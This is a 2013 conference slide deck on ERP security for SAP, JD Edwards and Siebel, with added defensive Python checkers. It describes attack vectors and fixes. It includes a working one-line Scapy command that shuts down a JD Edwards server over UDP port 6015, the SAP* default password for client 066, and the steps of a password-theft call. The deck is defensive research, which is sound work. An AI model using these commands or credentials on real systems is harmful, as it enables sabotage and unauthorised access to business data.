ERP Security:How hackers can open the safe and take the jewels
September 25-27, 2013
Ekoparty Security Conference
Buenos Aires, Argentina
Ezequiel Gutesman (@gutes) [email protected]
Jordan Santarsieri (@jsansec) [email protected]
ERP Security: How hackers can open the safe – www.onapsis.com – © 2013 Onapsis , Inc. – All rights reserved 2
Disclaimer
This publication is copyright 2013 Onapsis Inc. – All rights reserved.
This publication contains references to the products of SAP AG. SAP, R/3, xApps, xApp, SAP NetWeaver, Duet, PartnerEdge, ByDesign, SAP Business ByDesign, and other SAP products and services mentioned herein are trademarks or registered trademarks of SAP AG in Germany and in several other countries all over the world.
Business Objects and the Business Objects logo, BusinessObjects, Crystal Reports, Crystal Decisions, Web Intelligence, Xcelsius and other Business Objects products and services mentioned herein are trademarks or registered trademarks of Business Objects in the United States and/or other countries.
This publication contains references to the products of Oracle Corporation. Oracle products and services mentioned herein are trademarks or registered trademarks of Oracle in all countries all over the world.
SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable for errors or omissions with respect to the materials.
Oracle Corporation is neither the author nor the publisher of this publication and is not responsible for its content, and Oracle Corporation shall not be liable for errors or omissions with respect to the materials.
Agenda
1. Introduction
   • Why bother about ERPs?
   • History of ERP Security
   • ERP Security for hackers
2. Targeting ERPs
   • Reinventing the wheel: Technology stacks
   • Attack Vectors
   • Demo time! Sabotage, Espionage, Fraud
3. Conclusions
Why bother about ERPs?
ERP systems tie together the core business processes: sales, production, financial planning, invoicing, procurement, treasury, logistics, payroll, billing and human resources.
They are run by Forbes 500 companies and by mid-size companies alike.
Threat evolution: Zombies → Botnets → Hacktivism(*) → Cyberwarfare & Surveillance, all of them built on vulns.
(*) http://suelette.home.xs4all.nl/underground/underground.txt
• They run business-critical processes
• They store the most sensitive information
• Organizations are highly dependent on them
History of ERP security
Timeline 1970 → 2013. ERP / SAP security milestones:
• 1972: SAP RF → R/1
• 1980: SAP R/2 (mainframe)
• 1993: SAP R/3 (real-time, 3-tier)
• 2002: SAP "virus" (SAPVir); "Wir hacken eine SAP Datenbank" ("We hack an SAP database")
• 2003: "SAP" Password Sicherheit ("SAP" password security)
• 2004: SAP NetWeaver
• 2007: Exploiting SAP Internals
• 2008: SAP @ JtR
• 2009 (3 publications): Attacking SAP clients; Decompression of SAP's DIAG protocol; The risks of downward compatibility
• 2010 (5+): SAP Knowledge Management; Attacking users with SAPSploit; Rootkits and Trojans on your SAP Landscape; The truth about ABAP Security; Protecting SAP Applications Against Common Attacks (SAP); SAP Security Notes
• 2011 (5+): The Invoker Servlet; SAP Backdoors & Rootkits; Architecture & program vulnerabilities in SAP's J2EE engine; Security of Enterprise Business Application Systems; Attacks to SAP Web Applications
• 2012 (10+)
30 years of SoD vs. 13 years of technical ERP security research.
General security milestones over the same period, for comparison:
• 1972: Buffer overflows
• 1988: Morris Worm
• 1995: XSS
• 1996: Ping of Death
• 2001: Heap spraying; OWASP
• 2002: SQLi; CSRF
• 2003: Metasploit
• 2006: Bluepill
• 2008: Debian PRNG bug
• 2010: Practical Padding Oracles
• 2011: BEAST
• 2012: CRIME
ERP Security for hackers
• Espionage: extract customer/vendor/HR data, financial planning information, balances, profits, sales information, manufacturing recipes, etc.
• Sabotage: paralyze the operation of the organization by shutting down the ERP system, disrupting interfaces with other systems, deleting critical information, etc.
• Fraud: modify financial information, tamper with sales and purchase orders, create new vendors, modify vendor bank account numbers, etc.
Reinventing the wheel: Technology stacks
Layered architecture / attack vectors
• Client (web / API / thick client)
• Application server
• DB
• OS
Client ↔ application server: proprietary protocols / HTTP / SOAP / CORBA
Application server ↔ DB, external servers and other application servers: trust relationships / ODBC / other
Layered architecture / attack vectors – SAP: http://bit.ly/19AXe7Y
Layered architecture / attack vectors – Oracle JD Edwards: http://bitly.com/QB12xx
Web Server → HTTP → JDE Java Application Server (JAS) → JDENET → JDE Enterprise Server → ODBC → Database Server
JDE Deployment Server → ODBC → Database Server
Attack Vectors
• Components and servers through protocols
  – P4, DIAG, RFC, NI, CORBA, SOAP, JDENET, HTTP, SNC, etc.
• Crypto
  – Stored keys, default certificates, proprietary schemes
• Business through data manipulation
  – Default credentials, lack of checks
• Apps
  – Web, companion apps, transactions, reports, external tools, APIs
• DB
  – Connectors, trust relationships, default accounts
JD Edwards: Shutdown via UDP
The JDENet component listens on port 6015 (UDP) for control commands:
SHOWCONN TOGGLE_LOG CONNECT_FROM CONNECT_TO CONNECT_REJECT GET_WRKMGT VIEW_KERNEL_TRACE SHUTDOWN USRBROADCAST …
Wait...
Demo
>>> send(IP(dst="192.168.254.128")/UDP(dport=6015)/"SHUTDOWN")
0000  45 00 00 24 00 01 00 00 40 11 F9 25 C0 A8 00 46  E..$....@..%...F
0010  C0 A8 00 0C 00 35 17 7F 00 10 22 3D 53 48 55 54  .....5...."=SHUT
0020  44 4F 57 4E                                      DOWN
An attacker needs:
– Access to port 6015 (UDP) on the target
– To send a single UDP packet
An attacker gets:
– Immediate JDE Enterprise Server shutdown
Fix:
Apply the latest Oracle Critical Patch Update; the fix for this attack was released by Oracle in a scheduled CPU.
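As an added example (not code from the talk, from Onapsis or from Oracle), a small detector for the datagram above. It parses the raw IPv4/UDP bytes of the slide's hexdump, verifies the IP header checksum, and flags any payload sent to UDP/6015 that matches one of the control words listed on the previous slide. The command list is copied from the slide and is treated as non-exhaustive, so a payload that does not match is reported as "not flagged", not as harmless.

```python
"""Decode a raw IPv4/UDP datagram and flag JDENet control commands sent to
UDP/6015. Added example; the command list is the one shown on the slide."""
import struct
from dataclasses import dataclass
from typing import Optional

JDENET_UDP_PORT = 6015

# Control words listed on the slide; the slide's list ends with "...", so a
# miss here means "unknown payload", not "harmless".
JDENET_CONTROL_COMMANDS = frozenset({
    "SHOWCONN", "TOGGLE_LOG", "CONNECT_FROM", "CONNECT_TO", "CONNECT_REJECT",
    "GET_WRKMGT", "VIEW_KERNEL_TRACE", "SHUTDOWN", "USRBROADCAST",
})

# The 36-byte packet from the slide's hexdump (IPv4 header, UDP header,
# "SHUTDOWN" payload), re-typed here as the sample input.
SLIDE_CAPTURE = bytes.fromhex(
    "45000024000100004011f925c0a80046"
    "c0a8000c0035177f0010223d53485554"
    "444f574e"
)


@dataclass(frozen=True)
class UdpDatagram:
    src: str
    dst: str
    sport: int
    dport: int
    payload: bytes


def ipv4_header_checksum_ok(header: bytes) -> bool:
    """One's-complement sum over the header (checksum field included) must fold to 0xFFFF."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total == 0xFFFF


def parse_ipv4_udp(raw: bytes) -> UdpDatagram:
    """Parse an IPv4 packet carrying UDP (no link-layer header in front)."""
    if len(raw) < 20 or raw[0] >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (raw[0] & 0x0F) * 4
    total_len = struct.unpack("!H", raw[2:4])[0]
    if ihl < 20 or total_len > len(raw) or total_len < ihl + 8:
        raise ValueError("truncated or malformed IPv4 packet")
    if not ipv4_header_checksum_ok(raw[:ihl]):
        raise ValueError("bad IPv4 header checksum")
    if raw[9] != 17:
        raise ValueError("not UDP")
    src = ".".join(str(b) for b in raw[12:16])
    dst = ".".join(str(b) for b in raw[16:20])
    sport, dport, ulen, _csum = struct.unpack("!HHHH", raw[ihl:ihl + 8])
    if ulen < 8 or ihl + ulen > total_len:
        raise ValueError("bad UDP length")
    return UdpDatagram(src, dst, sport, dport, raw[ihl + 8:ihl + ulen])


def jdenet_control_command(dgram: UdpDatagram) -> Optional[str]:
    """Return the JDENet control word if this datagram carries one to UDP/6015."""
    if dgram.dport != JDENET_UDP_PORT:
        return None
    word = dgram.payload.rstrip(b"\x00").decode("ascii", "replace").strip()
    return word if word in JDENET_CONTROL_COMMANDS else None


def alert_line(raw: bytes) -> Optional[str]:
    """One detection pass over a raw packet: an alert string, or None if not flagged."""
    try:
        dgram = parse_ipv4_udp(raw)
    except ValueError:
        return None
    cmd = jdenet_control_command(dgram)
    if cmd is None:
        return None
    return (f"JDENet control command {cmd} from {dgram.src}:{dgram.sport} "
            f"to {dgram.dst}:{dgram.dport}")


if __name__ == "__main__":
    print(alert_line(SLIDE_CAPTURE))
```

Two caveats when turning this into a real rule: UDP carries no handshake, so the source address in the alert is whatever the sender put in the header and cannot be trusted for attribution; and because one packet is enough, the useful control is not detection but making UDP/6015 unreachable from anything that is not a JD Edwards component, with the CPU applied on top.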
Siebel: Bypass log in
The Anonymous user
• Required even if the application does not allow access by unregistered users
• Used at start-up to connect to the "datasource"
• If deleted, no user can access Siebel
• At installation time, Siebel asks you to choose an already created user that will become the Anonymous user
• It should have low privileges, but to avoid configuration issues...
Siebel: Bypass log in
An attacker needs:
– Access to the application
– An insecure configuration of the Anonymous user
An attacker gets:
– Complete control of the Siebel installation
Demo
Fix:
In the Siebel configuration file, set the "anonymous user" property to a low-privileged user.
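As an added example (not code from the talk, from Onapsis or from Oracle), a check for the fix above applied to the web-server plug-in configuration. It assumes, as is common for Siebel installations but should be verified against your release, that the anonymous user is set with the AnonUserName / AnonPassword keys of eapps.cfg, that a [defaults] section supplies fallback values for the per-application sections, that SADMIN is the stock administrative login and that GUESTCST is a low-privileged guest login. The configuration text is constructed for the example.

```python
"""Audit a Siebel eapps.cfg for an anonymous user that resolves to a
privileged account. Added example; key names, section layout and the
SADMIN / GUESTCST account names are assumptions to verify per release."""
from typing import Dict, List, Optional, Tuple

# Accounts that must never be the anonymous user (assumption: SADMIN is the
# stock Siebel administrator; extend with your own admin logins).
PRIVILEGED_ACCOUNTS = frozenset({"SADMIN"})

# Constructed sample of the insecure configuration the talk describes: the
# [defaults] section makes every application that does not override it
# log in anonymously as the administrator.
WEAK_EAPPS_CFG = """\
[swe]
Language = enu

[defaults]
AnonUserName = SADMIN
AnonPassword = SADMIN

[/callcenter_enu]
ConnectString = siebel.TCPIP.None.None://siebapp:2321/SBA/SCCObjMgr_enu

[/eservice_enu]
ConnectString = siebel.TCPIP.None.None://siebapp:2321/SBA/eServiceObjMgr_enu
AnonUserName = GUESTCST
AnonPassword = GUESTCST
"""

# The same file after the fix: the fallback is a low-privileged guest login.
FIXED_EAPPS_CFG = WEAK_EAPPS_CFG.replace(
    "AnonUserName = SADMIN\nAnonPassword = SADMIN",
    "AnonUserName = GUESTCST\nAnonPassword = GUESTCST",
)


def parse_eapps_cfg(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parser: section name -> {lower-cased key: value}."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def effective_anonymous_users(text: str) -> Dict[str, Optional[str]]:
    """Resolve the anonymous user per application section, honouring [defaults]."""
    sections = parse_eapps_cfg(text)
    fallback = sections.get("defaults", {}).get("anonusername")
    return {
        app: params.get("anonusername", fallback)
        for app, params in sections.items()
        if app.startswith("/")  # application sections look like [/callcenter_enu]
    }


def audit_anonymous_users(text: str, privileged=PRIVILEGED_ACCOUNTS) -> List[Tuple[str, str]]:
    """Return (application, anonymous user) pairs that resolve to a privileged login."""
    return [
        (app, user)
        for app, user in effective_anonymous_users(text).items()
        if user is not None and user.upper() in privileged
    ]


if __name__ == "__main__":
    for app, user in audit_anonymous_users(WEAK_EAPPS_CFG):
        print(f"{app}: anonymous user {user} is privileged; "
              "set AnonUserName to a low-privileged login")
    print("after fix:", audit_anonymous_users(FIXED_EAPPS_CFG))
```

The check resolves the anonymous user per application rather than only reading [defaults], because a single application section that inherits the privileged fallback is enough to hand out the administrator session the slide describes. Changing the user name is only half of the fix: the replacement account also has to exist in Siebel with the minimal responsibilities the anonymous login needs.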
SAP: Diverting payments (default credentials)
SAP clients (or mandants)
– Entity with independent data (like a tenant)
– 3-digit identifiers
– "Special" default clients (created on installation):
  • 000 → Cross-client tasks
  • 001 → Template for new clients
  • 066 → SAP support
http://help.sap.com/saphelp_nw70/helpdata/en/3e/cdaccbedc411d3a6510000e835363f/content.htm
SAP* is given the master password on installation, but in client 066 SAP* is left with the default password 06071992.
Catch: SAP* in client 066 does not have SAP_ALL privileges, but...
SAP: Diverting payments (default credentials)
Demo
Fix:
– Change the SAP* password on all clients (especially 066)
– Correctly assign SAP* permissions
JD Edwards: Stealing passwords
Again JDENet: it is also listening on port 6015 (TCP) for JDEMsg commands.
These can remotely retrieve information from the JDE.INI file, including sensitive information in clear text:
• Kernel types and configuration
• Security Server configuration
• SSO Node information
• Database information
JD Edwards: Stealing passwords
An attacker needs:
– Access to port 6015 (TCP) on the target
– To send a function call (JdeMsg number 563)
  • Use the hard-coded key and provide the victim's username
An attacker gets:
– The victim's password
JD Edwards: Stealing passwords
Demo
Fix:
Apply the latest Oracle Critical Patch Update; the fix for this attack was released by Oracle in a scheduled CPU.
Siebel: Search Inside
Siebel Query Language (no, it's not SQL)
• Used everywhere in Siebel
• Originally designed to filter data inside applets
• Executing queries is not restricted by authorization checks (privilege independent)
Siebel: Search Inside
Access control in Siebel
• At view level: who can access the views
• At business component level: who can access the data
Siebel Query Language Injection
Demo
Fix:
Using eScript, catch the PreQuery or InvokeMethod query events and apply a custom filter that prevents the use of dangerous functions.
SAP: Getting DB Admin rights
"The J2EE Engine provides a secure storage area where applications or service components on the J2EE Engine can store sensitive data such as passwords or communication destinations, in encrypted form" (*)
(*) http://help.sap.com/saphelp_nw73/helpdata/en/47/b08e68542e3378e10000000a421937/content.htm
/usr/sap/<SID>/SYS/global/security/data/SecStore.properties (3DES)
Problem #1: get the file
Problem #2: decrypt the file
Problem #3: access the DB
SAP: Getting DB Admin rights
1. Getting the Secure Store file
https://service.sap.com/sap/support/notes/1682613
SAP NetWeaver Application Server speaks RMI and CORBA over P4 (RMI). P4 is used for:
• Communication between objects in different namespaces (e.g. FileTransfer_Stub)
• Reliable client-server connections
• Transparent failover for clustered remote objects
• Etc.
Target: /usr/sap/<SID>/SYS/global/security/data/SecStore.properties
SAP: Getting DB Admin rights
2. Decrypt the Secure Store: it is 3DES, so where is the key bundle?
/usr/sap/<SID>/SYS/global/security/data/SecStore.properties
/usr/sap/<SID>/SYS/global/security/data/SecStore.key
3. Access the DB
SAP: Getting DB Admin rights
Demo
Fix:
– Apply note https://service.sap.com/sap/support/notes/1682613
– Correctly restrict access to the SecStore.key file
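As an added example (not code from the talk, from Onapsis or from SAP), a check for the second part of the fix: it verifies that SecStore.properties and SecStore.key are not readable or writable by group or others and, optionally, that they belong to the expected owner (on a real system the <sid>adm user, which the example does not assume). The directory layout follows the slide, but the files it creates are constructed placeholders, not a real secure store, so the check runs without an SAP installation. It looks only at OS permissions; it does not parse or decrypt either file.

```python
"""Audit OS-level access to the J2EE secure store and its key file.
Added example; creates a constructed SYS/global/security/data layout in a
temporary directory so it runs anywhere (POSIX mode bits are assumed)."""
import os
import stat
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

SECSTORE_FILES = ("SecStore.properties", "SecStore.key")


def audit_secstore(data_dir, expected_owner_uid: Optional[int] = None) -> List[str]:
    """Return findings for the two files; an empty list means both are locked down."""
    findings: List[str] = []
    for name in SECSTORE_FILES:
        path = Path(data_dir) / name
        if not path.is_file():
            findings.append(f"{name}: missing")
            continue
        st = path.stat()
        mode = stat.S_IMODE(st.st_mode)
        # The key sits next to the ciphertext, so the store is only as secret
        # as the weaker of the two files: both must be owner-only.
        if mode & (stat.S_IRWXG | stat.S_IRWXO):
            findings.append(f"{name}: mode {mode:04o} grants group/other access")
        if expected_owner_uid is not None and st.st_uid != expected_owner_uid:
            findings.append(f"{name}: owned by uid {st.st_uid}, expected {expected_owner_uid}")
    return findings


def make_sample_store(root, mode: int) -> Path:
    """Create the slide's directory layout with placeholder files at the given mode."""
    data_dir = Path(root) / "SYS" / "global" / "security" / "data"
    data_dir.mkdir(parents=True, exist_ok=True)
    (data_dir / "SecStore.properties").write_text("# constructed placeholder\n")
    (data_dir / "SecStore.key").write_bytes(b"\x00" * 24)  # placeholder, not a real key
    for name in SECSTORE_FILES:
        os.chmod(data_dir / name, mode)
    return data_dir


def demo() -> Tuple[List[str], List[str]]:
    """Audit a world-readable store, then the same store after chmod 600."""
    with tempfile.TemporaryDirectory() as tmp:
        weak = audit_secstore(make_sample_store(tmp, 0o644))
        fixed = audit_secstore(make_sample_store(tmp, 0o600), os.getuid())
    return weak, fixed


if __name__ == "__main__":
    weak, fixed = demo()
    print("before:", *weak, sep="\n  ")
    print("after:", fixed or "no findings")
```

Mode bits only help against readers who are not the server's own OS user. The first problem on the slide, fetching the file through P4 and the FileTransfer objects, runs as that user, which is why the note above is the other half of the fix and not an alternative to it.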
Conclusions
• ERP systems are among the most critical systems in the organization, and that makes them a very interesting target for attackers
• ERP security has a long history, most of it about SoD
• Technical vulnerabilities are more critical than SoD, since the attacker doesn't need any user in the system
• The attack surface is huge: proprietary protocols and custom technologies are everywhere
• Inherited code from the past
• Patching practices are delayed due to complexity and cost
• Since 2009 ERP cyber-security has been getting more attention. Leading organizations are already dealing with this.
Ezequiel Gutesman (@gutes) [email protected]
Jordan Santarsieri (@jsansec) [email protected]
blog.onapsis.com
adventure.onapsis.com